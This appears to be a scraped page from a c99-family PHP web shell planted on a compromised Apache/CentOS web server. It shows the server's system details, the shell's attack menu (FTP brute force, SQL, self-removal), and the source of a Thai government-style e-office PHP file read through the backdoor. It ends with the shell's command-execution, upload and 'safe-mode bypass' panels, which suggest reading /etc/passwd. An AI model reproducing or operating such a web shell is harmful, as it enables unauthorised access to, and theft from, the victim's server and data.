!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 50.92 GB of 127.8 GB (39.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processHisDocToNewDept.php (5.32 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../class/clsPerson.php";
include_once 
"../link/function.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocLinePosition.php";
include_once 
"../class/clsDocLineConfig.php";
include_once 
"../class/clsReceiveSendType.php";
include_once 
"../class/clsDocType.php";
include_once 
"../class/clsDocSpeedLevel.php";
include_once 
"../class/clsDocSecreLevel.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsDocattatches.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"../class/clsRunningDoc.php";
include_once 
"../class/clsDocForSign.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oDP4 = new Department($oC);
$oDP5 = new Department($oC);
$oPS = new person($oC);
$oPS2 = new person($oC);
$oPS3 = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDatt = new Docattatches($oC);
$oDatt2 = new Docattatches($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oRs4 = new DocReceiveSend($oC);
$oRd = new runningdoc($oC);
$oDfs = new DocForSign($oC);

$MaxDocGroup=$oDP->SearchMaxDocGroup();

    
$flagCommit true;
    
$checkflagCommittrue;
    
$oC->BeginTrans();


$oDoc2->SearchByKey($DocID);
$oDoc2->GetRecord();

$timeDocDateCreate=getNowDateTh()." ".date('H:i:s');
$oDlc->SearchByKey($Dlcid); $oDlc->GetRecord();
    if(
$Dlcsecond=="Y"){
        
$oDlc2->SearchByKey($DlcsecondId); $oDlc2->GetRecord(); 
        
$mypersonId=$oDlc2->personId;
    }else{
        
$mypersonId=$oDlc->personId;
    }

                
$oDoc->AddNew();
                
$oDoc->DocID=$oDoc->GetNextCode();
                
$e=$oDoc->GetNextCode();
                
$oDoc->DlcID=$Dlcid;
                
$oDoc->PtID=$oDoc2->PtID;
                
$oDoc->DtID=$oDoc2->DtID;
                
$oDoc->DslID=$oDoc2->DslID;
                
$oDoc->DclID=$oDoc2->DclID;
                
$oDoc->DsID=1;
                
$oDoc->RsID=$oDoc2->RsID;
                
$oDoc->DocDateCreate=$timeDocDateCreate;
                
$oDoc->DocUserCreate=$mypersonId;
                
$oDoc->DocTypeNo=$oDoc2->DocTypeNo;
                
$oDoc->DocDate=$oDoc2->DocDate;
                
$oDoc->DocNo=$oDoc2->DocNo;
                
$oDoc->DocSubject=$oDoc2->DocSubject;
                
$oDoc->DocFrom=$oDoc2->DocFrom;
                
$oDoc->DocTo=$oDoc2->DocTo;
                
$oDoc->DocShortDesc=$oDoc2->DocShortDesc;
                
$oDoc->DocSpeedLevelDueDate=$oDoc2->DocSpeedLevelDueDate;
                
$oDoc->DocStart=$oDoc2->DocStart;
                
$oDoc->DocFinish=$oDoc2->DocFinish;
                
$oDoc->DocGroup=$MaxDocGroup;
                
$oDoc->DocRef=$oDoc2->DocRef;
                
$oDoc->DocCircular=$oDoc2->DocCircular;
                
$oDoc->DocfCir=$oDoc2->DocfCir;
                
$oDoc->DocOther=$oDoc2->DocOther;
                
$oDoc->CertificatePs=$oDoc2->CertificatePs;
                
$oDoc->fDelete=$oDoc2->fDelete;
                
$oDoc->endDoc=$oDoc2->endDoc;
                
$oDoc->sendToPs=$oDoc2->sendToPs;
                
$oDoc->AnID=$oDoc2->AnID;
                
$oDoc->DocRefAns=$oDoc2->DocRefAns;
                
$oDoc->DocRefAnsID=$oDoc2->DocRefAnsID;
                
$oDoc->useMainDocNo=$oDoc2->useMainDocNo;
                
$oDoc->DocforSign=$oDoc2->DocforSign;
                
$oDoc->DocTelOwner=$oDoc2->DocTelOwner;
                
$oDoc->DocSendReal=$oDoc2->DocSendReal;
                
$oDoc->DocDeptOwner=$oDoc2->DocDeptOwner;
                
$oDoc->DocFaxOwner=$oDoc2->DocFaxOwner;
                
$oDoc->DocCopySend=$oDoc2->DocCopySend;
                
$oDoc->DocContactE=$oDoc2->DocContactE;
                
$oDoc->DocIDHisOld=$DocID;
                
$checkflagCommit $oDoc->Save();
                if(!
$checkflagCommit){ $flagCommit=$checkflagCommit;   }


                
$oRs->AddNew();
                
$oRs->DrsID=$oRs->GetNextCode();
                
$oRs->DocID=$e;
                
$oRs->DlcID=$Dlcid;
                
$oRs->DsID=1;
                
$oRs->DrsDocTypeNo=$oDoc2->DocTypeNo;
                
$oRs->DrsReceiveDate=$timeDocDateCreate;
                
$oRs->DrsReceivePersonId=$mypersonId;
                
$oRs->DrsDlcIDCreate=$Dlcid;
                
$oRs->DrsPsIDCreate=$oDlc->personI;
                
$oRs->DocGroup=$MaxDocGroup;    
                
$checkflagCommit $oRs->Save();
                if(!
$checkflagCommit){ $flagCommit=$checkflagCommit;   }
                 
                 
                 
                if(
$oDoc2->DocPID=="0" || $oDoc2->DocPID==""){  $searchDoc=$oDoc2->DocID; }else{ $searchDoc=$oDoc2->DocPID; } 
                
$oDatt2->SearchByDocID($searchDoc);
                while(
$oDatt2->GetRecord()){
                    
$oDatt->AddNew();
                    
$oDatt->DaID=$oDatt->GetNextCode();
                    
$oDatt->DocID=$e;
                    
$oDatt->DaFileName=$oDatt2->DaFileName;
                    
$oDatt->DaUpFileName=$oDatt2->DaUpFileName
                    
$oDatt->DaSeq=$oDatt2->DaSeq;
                    
$oDatt->DaAddNew=$oDatt2->DaAddNew;
                    
$oDatt->DaAddNewSended=$oDatt2->DaAddNewSended;
                    
$checkflagCommit $oDatt->Save();
                    if(!
$checkflagCommit){ $flagCommit=$checkflagCommit;   }
                }

                
$oDoc2->Edit();
                
$oDoc2->DocIDHisNew=$e;
                
$checkflagCommit $oDoc2->Save();
                if(!
$checkflagCommit){ $flagCommit=$checkflagCommit;   }

                    if(
$flagCommit)
                        
$oC->CommitTrans();
                    else
                        
$oC->RollbackTrans();    

$saveurlencode=base64_decode($saveurlencode);
echo 
"<meta http-equiv='refresh' content='0; URL=printRepHisRegisDocDeptToNewDept.php?$saveurlencode'>";
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0112 ]--